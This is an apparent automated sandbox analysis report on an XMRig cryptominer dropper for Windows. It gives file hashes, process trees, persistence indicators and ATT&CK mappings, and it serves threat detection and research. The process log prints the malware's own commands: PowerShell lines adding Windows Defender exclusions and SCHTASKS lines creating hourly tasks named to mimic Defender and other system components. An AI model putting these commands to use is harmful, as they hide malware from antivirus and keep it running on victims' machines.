xmrig | 6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e

Analysis

max time kernel
300s
max time network
265s
platform
windows10_x64
resource
win10-20220414-en
submitted
21-05-2022 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe
Size

71KB
MD5

5f6e646c0ccb6fe1db72d48b92fb1095
SHA1

79a60cbb9c12284d34e561f0afe2b246be3e4cf4
SHA256

6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e
SHA512

93500c8f70c40ca576eb3b0b970087b3f0ab477925f6e70ee31544d7663ef2bf53da607c6f53d75c6916177a8ac8af45d7c7171fa53c80500616f344af8205ec

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Dllhost\winlogson.exe	xmrig

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

dllhost.exewinlogson.exe

pid process

4996 dllhost.exe
4668 winlogson.exe

pid	process
4996	dllhost.exe
4668	winlogson.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

dllhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Windows\\System32\\SecurityHealthSystray.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2111.5-0\\MsMpEng.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\NvStray = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe\\Cortana.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe"	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4784 schtasks.exe
5072 schtasks.exe
4256 schtasks.exe
3792 schtasks.exe

pid	process
4784	schtasks.exe
5072	schtasks.exe
4256	schtasks.exe
3792	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exepowershell.exepowershell.exedllhost.exe

pid	process
2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4120	powershell.exe
4120	powershell.exe
4120	powershell.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe
4996	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

644

pid	process
644

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exepowershell.exepowershell.exedllhost.exewinlogson.exe

description	pid	process
Token: SeDebugPrivilege	2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	4996	dllhost.exe
Token: SeLockMemoryPrivilege	4668	winlogson.exe
Token: SeLockMemoryPrivilege	4668	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

winlogson.exe

pid process

4668 winlogson.exe

pid	process
4668	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.execmd.exedllhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2656 wrote to memory of 2956	2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe	cmd.exe
PID 2656 wrote to memory of 2956	2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe	cmd.exe
PID 2656 wrote to memory of 2956	2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe	cmd.exe
PID 2956 wrote to memory of 4676	2956	cmd.exe	chcp.com
PID 2956 wrote to memory of 4676	2956	cmd.exe	chcp.com
PID 2956 wrote to memory of 4676	2956	cmd.exe	chcp.com
PID 2956 wrote to memory of 4868	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 4868	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 4868	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 4120	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 4120	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 4120	2956	cmd.exe	powershell.exe
PID 2656 wrote to memory of 4996	2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe	dllhost.exe
PID 2656 wrote to memory of 4996	2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe	dllhost.exe
PID 2656 wrote to memory of 4996	2656	6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe	dllhost.exe
PID 4996 wrote to memory of 816	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 816	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 816	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 412	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 412	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 412	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 1256	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 1256	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 1256	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 872	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 872	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 872	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 812	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 812	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 812	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 4192	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 4192	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 4192	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 192	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 192	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 192	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 4004	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 4004	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 4004	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 1132	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 1132	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 1132	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 664	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 664	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 664	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 2464	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 2464	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 2464	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 2480	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 2480	4996	dllhost.exe	cmd.exe
PID 4996 wrote to memory of 2480	4996	dllhost.exe	cmd.exe
PID 816 wrote to memory of 4784	816	cmd.exe	schtasks.exe
PID 816 wrote to memory of 4784	816	cmd.exe	schtasks.exe
PID 816 wrote to memory of 4784	816	cmd.exe	schtasks.exe
PID 872 wrote to memory of 5072	872	cmd.exe	schtasks.exe
PID 872 wrote to memory of 5072	872	cmd.exe	schtasks.exe
PID 872 wrote to memory of 5072	872	cmd.exe	schtasks.exe
PID 412 wrote to memory of 4256	412	cmd.exe	schtasks.exe
PID 412 wrote to memory of 4256	412	cmd.exe	schtasks.exe
PID 412 wrote to memory of 4256	412	cmd.exe	schtasks.exe
PID 812 wrote to memory of 3792	812	cmd.exe	schtasks.exe
PID 812 wrote to memory of 3792	812	cmd.exe	schtasks.exe
PID 812 wrote to memory of 3792	812	cmd.exe	schtasks.exe
PID 4996 wrote to memory of 1352	4996	dllhost.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe
"C:\Users\Admin\AppData\Local\Temp\6b33c7f2f55f0589987b58fde7a9552c21273ea07e4d593893b80d8ebc77627e.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
2⤵
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\SysWOW64\chcp.com
chcp 1251
3⤵
PID:4676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:816

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:4784

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:412

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:4256

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1256

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:5072

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:3792

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:192

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:4004

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4523" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk1885" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:2464

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk2064" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:664

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk2074" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
3⤵
PID:1352

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:3684

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
3⤵
PID:3848

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:4636

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4668

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe
Filesize
80KB

MD5
95ee6687b1ff58db76e540c95e2dcbfd

SHA1
c534d60704d491ba5cf38993970bb7ed79fffcf3

SHA256
7a087e9902d901c61ba1299c399b225e3c7d0584c849172aafed72ecd4989a9c

SHA512
982609ae770a0c3d8063b960074e19a9ae2379de0f2e599144d73effabb8696fe4bfd0ff3756f450a3a1da0fd511c93d8f6456c394b875c1a56055861780fd79

Download Submit
C:\ProgramData\Dllhost\dllhost.exe
Filesize
80KB

MD5
95ee6687b1ff58db76e540c95e2dcbfd

SHA1
c534d60704d491ba5cf38993970bb7ed79fffcf3

SHA256
7a087e9902d901c61ba1299c399b225e3c7d0584c849172aafed72ecd4989a9c

SHA512
982609ae770a0c3d8063b960074e19a9ae2379de0f2e599144d73effabb8696fe4bfd0ff3756f450a3a1da0fd511c93d8f6456c394b875c1a56055861780fd79

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.9MB

MD5
ae6c92c8073b1239390369d3ed93538f

SHA1
a76ea83bdcfa472cd593363e9bb254df494a5577

SHA256
d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

SHA512
59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

Download Submit
C:\ProgramData\SystemFiles\config.json
Filesize
305B

MD5
f1acc99c85a24a7d40db1229db5041dc

SHA1
60144a1cb84ac74594a11e7a67386cec3b7d1a97

SHA256
a0dc27c9fd7355f2eed1216bc4be2ddbbd52618cdc60df35f04c682b633d81da

SHA512
fa137566868c99be0c15b9de9060c92cb7e3b04f8ee923ead98ccefc48a8ef10ad4963b74f17672cde5d20a6cd21e627444cb59f048f5554bd182a57666aa57e

Download Submit
C:\ProgramData\SystemFiles\sys_rh.bin
Filesize
1KB

MD5
01b835563bb1b0e35a7687545885b710

SHA1
cd43aea0c4d3a8cf86a539c523c581f61cfc63de

SHA256
5243547138d42d4294ecb25422e28ca0d5cd99adf2655590d4f38c74b26ec035

SHA512
24412924242d0a5ab3e5bcc6ed6333329b1729ce96360318e006db8e1180cee9b54089b77f5f826056db4fb40486e8ff79307f62e9ca3d840c197c02cd6cb4e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
1454e897ddf45b2b384382c178748a69

SHA1
9ee9be6f0c64e73a7b4219cda7cde3181d4b1088

SHA256
088e5a1081248ba5b9feeaffbbec69aeef50fde330960a46879d1ab635f6eef2

SHA512
03b4723e13ad0389a4836aaa8a87618cab365e6c1160580d34080715bdf46b5ca3fed29351d213344aede92c5933aff858692291579707b18ca6806adf5e4342

Download Submit
memory/192-752-0x0000000000000000-mapping.dmp

Download
memory/412-728-0x0000000000000000-mapping.dmp

Download
memory/664-769-0x0000000000000000-mapping.dmp

Download
memory/812-740-0x0000000000000000-mapping.dmp

Download
memory/816-726-0x0000000000000000-mapping.dmp

Download
memory/872-735-0x0000000000000000-mapping.dmp

Download
memory/1132-764-0x0000000000000000-mapping.dmp

Download
memory/1256-732-0x0000000000000000-mapping.dmp

Download
memory/1352-1010-0x0000000000000000-mapping.dmp

Download
memory/2464-775-0x0000000000000000-mapping.dmp

Download
memory/2480-783-0x0000000000000000-mapping.dmp

Download
memory/2656-148-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-187-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-138-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-139-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-140-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-141-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-142-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-143-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-144-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-145-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-146-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-147-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-118-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-149-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-150-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-151-0x00000000000D0000-0x00000000000E8000-memory.dmp

Filesize
96KB

Download
memory/2656-152-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-153-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-154-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-155-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-156-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-157-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-158-0x0000000002410000-0x0000000002416000-memory.dmp

Filesize
24KB

Download
memory/2656-159-0x000000000A3B0000-0x000000000A8AE000-memory.dmp

Filesize
5.0MB

Download
memory/2656-160-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-161-0x0000000009EB0000-0x0000000009F42000-memory.dmp

Filesize
584KB

Download
memory/2656-162-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-163-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-164-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-165-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-166-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-167-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-168-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-169-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-170-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-171-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-172-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-173-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-174-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-175-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-176-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-177-0x0000000004990000-0x000000000499A000-memory.dmp

Filesize
40KB

Download
memory/2656-178-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-179-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-180-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-181-0x000000000A320000-0x000000000A386000-memory.dmp

Filesize
408KB

Download
memory/2656-182-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-183-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-184-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-185-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-186-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-137-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-119-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-120-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-121-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-122-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-123-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-124-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-125-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-126-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-127-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-128-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-129-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-130-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-131-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-132-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-133-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-134-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-135-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2656-136-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/2956-190-0x0000000000000000-mapping.dmp

Download
memory/3684-1032-0x0000000000000000-mapping.dmp

Download
memory/3792-851-0x0000000000000000-mapping.dmp

Download
memory/3848-1114-0x0000000000000000-mapping.dmp

Download
memory/4004-758-0x0000000000000000-mapping.dmp

Download
memory/4120-551-0x0000000000000000-mapping.dmp

Download
memory/4192-746-0x0000000000000000-mapping.dmp

Download
memory/4256-835-0x0000000000000000-mapping.dmp

Download
memory/4636-1120-0x0000000000000000-mapping.dmp

Download
memory/4668-1133-0x000001E43F600000-0x000001E43F640000-memory.dmp

Filesize
256KB

Download
memory/4668-1134-0x000001E43F640000-0x000001E43F660000-memory.dmp

Filesize
128KB

Download
memory/4668-1129-0x0000000000000000-mapping.dmp

Download
memory/4676-196-0x0000000000000000-mapping.dmp

Download
memory/4784-824-0x0000000000000000-mapping.dmp

Download
memory/4868-312-0x00000000098E0000-0x00000000098FE000-memory.dmp

Filesize
120KB

Download
memory/4868-240-0x0000000007090000-0x00000000070C6000-memory.dmp

Filesize
216KB

Download
memory/4868-266-0x0000000008250000-0x00000000085A0000-memory.dmp

Filesize
3.3MB

Download
